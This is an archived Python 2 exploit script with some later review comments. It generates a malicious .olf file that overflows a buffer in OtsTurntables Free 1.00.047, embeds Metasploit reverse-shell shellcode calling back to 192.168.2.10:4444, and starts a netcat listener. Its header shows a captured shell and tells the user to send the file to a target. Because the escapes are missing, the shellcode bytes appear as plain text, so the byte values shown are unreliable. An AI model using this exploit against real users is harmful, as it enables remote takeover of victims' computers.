ots100047-overflow.txt
Posted on 16 February 2010
#!/usr/bin/python
#
# ###################################################################
#
# OtsTurntables Free v1.00.047 (.olf) Universal Buffer Overflow Exploit
# Date: 14-01-2010
# Author: mr_me
# Software Link: http://www.otsturntables.com/download-otsturntables-free/
# Version: 1.00.047
# Tested on: Windows XP sp3
# Greetz: corelanc0d3r/jacky/eske/sinn3r/EdiStrosar/Rick2600/MarkoT/jnz
# bad chars: 'x00x0axbdx0dx20'
#
# ** For educational purposes only **
#
# ####################################################################
#
# ~! I want to go back to the matrix !~
#
# mrme@backtrack:~$ ./0wnm3.py 4444 awsome-electro.olf
#
# [+] OtsTurntables Free v1.00.047 (olf file) BOF Exploit
# [+] Creating exploit file..
# [+] Writing 15000 bytes to awsome-electro.olf.. ph33r
# [+] Send awsome-electro.olf to your target
# [+] Waiting for a shell on port: 4444
# listening on [any] 4444 ...
# 192.168.2.19: inverse host lookup failed: Unknown server error : Connection timed out
# connect to [192.168.2.10] from (UNKNOWN) [192.168.2.19] 2624
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:OtsLabsLists>
#
# NOTE(review): Python 2 script (print statements). It is a proof-of-concept
# file generator: it writes a fixed-size buffer to the path given on the
# command line and then starts a netcat listener on the given port. The
# version/platform claims above are the author's; nothing in the code
# verifies them.

import sys, os

def banner():
    # Print the tool's ASCII-art banner followed by its title line.
    # Runs of whitespace inside the art appear collapsed on this page.
    print "|------------------------------------------------------------------|"
    print "| __ __ |"
    print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"
    print "| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |"
    print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"
    print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |"
    print "| |"
    print "|-------------------------------------------------[ EIP Hunters ]--|"
    print "[+] OtsTurntables Free v1.00.047 (olf file) BOF Exploit"

# Argument handling: exactly two positional arguments are expected
# (listen port, output filename). Neither is validated beyond presence.
if len(sys.argv) < 3:
    banner()
    print "[?] Usage: " + sys.argv[0] + " <port> <filename>"
    sys.exit(1)

port = sys.argv[1]
filename = sys.argv[2]

# windows/shell_reverse_tcp - 310 bytes
# http://www.metasploit.com
# Encoder: x86/fnstenv_mov
# LHOST=192.168.2.10, EXITFUNC=seh, LPORT=4444
#
# NOTE(review): as rendered on this page the literals below are plain
# multi-character ASCII text ("x6a", "x48", ...), not byte escapes; the same
# applies to the "x41"/"x90" fillers further down. Byte values and lengths
# read off this page are therefore not reliable, e.g. for building
# detection signatures.
shell = ("x6ax48x59xd9xeexd9x74x24xf4x5bx81x73x13x47x4b"
"x25x9ax83xebxfcxe2xf4xbbx21xcexd7xafxb2xdax65"
"xb8x2bxaexf6x63x6fxaexdfx7bxc0x59x9fx3fx4axca"
"x11x08x53xaexc5x67x4axcexd3xccx7fxaex9bxa9x7a"
"xe5x03xebxcfxe5xeex40x8axefx97x46x89xcex6ex7c"
"x1fx01xb2x32xaexaexc5x63x4axcexfcxccx47x6ex11"
"x18x57x24x71x44x67xaex13x2bx6fx39xfbx84x7axfe"
"xfexccx08x15x11x07x47xaexeax5bxe6xaexdax4fx15"
"x4dx14x09x45xc9xcaxb8x9dx43xc9x21x23x16xa8x2f"
"x3cx56xa8x18x1fxdax4ax2fx80xc8x66x7cx1bxdax4c"
"x18xc2xc0xfcxc6xa6x2dx98x12x21x27x65x97x23xfc"
"x93xb2xe6x72x65x91x18x76xc9x14x08x76xd9x14xb4"
"xf5xf2x87xe3x27x90x21x23x34xc6x21x18xacx7bxd2"
"x23xc9x63xedx2bx72x65x91x21x35xcbx12xb4xf5xfc"
"x2dx2fx43xf2x24x26x4fxcax1ex62xe9x13xa0x21x61"
"x13xa5x7axe5x69xedxdexacx67xb9x09x08x64x05x67"
"xa8xe0x7fxe0x8ex31x2fx39xdbx29x51xb4x50xb2xb8"
"x9dx7excdx15x1ax74xcbx2dx4ax74xcbx12x1axdax4a"
"x2fxe6xfcx9fx89x18xdax4cx2dxb4xdaxadxb8x9bx4d"
"x7dx3ex8dx5cx65x32x4fxdax4cxb8x3cxd9x65x97x23"
"xd5x10x43x14x76x65x91xb4xf5x9a");

# Assemble the file body: filler, a 4-byte stub, a 4-byte overwrite value,
# a short filler run, the payload above, then padding so that the final
# buffer is exactly 15000 characters long. If the pieces above already
# exceed 15000, the last multiplication is by a negative number and adds
# nothing, so the file would be longer than the banner claims.
exploit = "x41" * 900
exploit += "xebx06x90x90"
exploit += "x46x79x23x01" # CALL DWORD PTR SS:[ESP+2c]
exploit += "x90" * 30
exploit += shell
exploit += "x41" * (15000-len(exploit))

banner()

try:
    print "[+] Creating exploit file.."
    print "[+] Writing",len(exploit),"bytes to " + filename + ".. ph33r"
    print "[+] Send " + filename + " to your target"
    # Text-mode open ('w'); on Windows this would translate newline bytes.
    turntable = open(filename,'w');
    turntable.write(exploit);
    turntable.close();
    print "[+] Waiting for a shell on port: " + port
    # `port` is interpolated unvalidated into a shell command string; it is
    # never checked to be numeric. os.system() does not raise if `nc` is
    # missing -- it only returns a non-zero status, which is ignored here.
    os.system('nc -lvp ' + port)
except:
    # Bare except: every exception raised in the block above, whatever its
    # cause (including KeyboardInterrupt on Python 2), is reported as a
    # permissions problem and the real error is discarded.
    print "[-] Error: You do not have correct permissions.."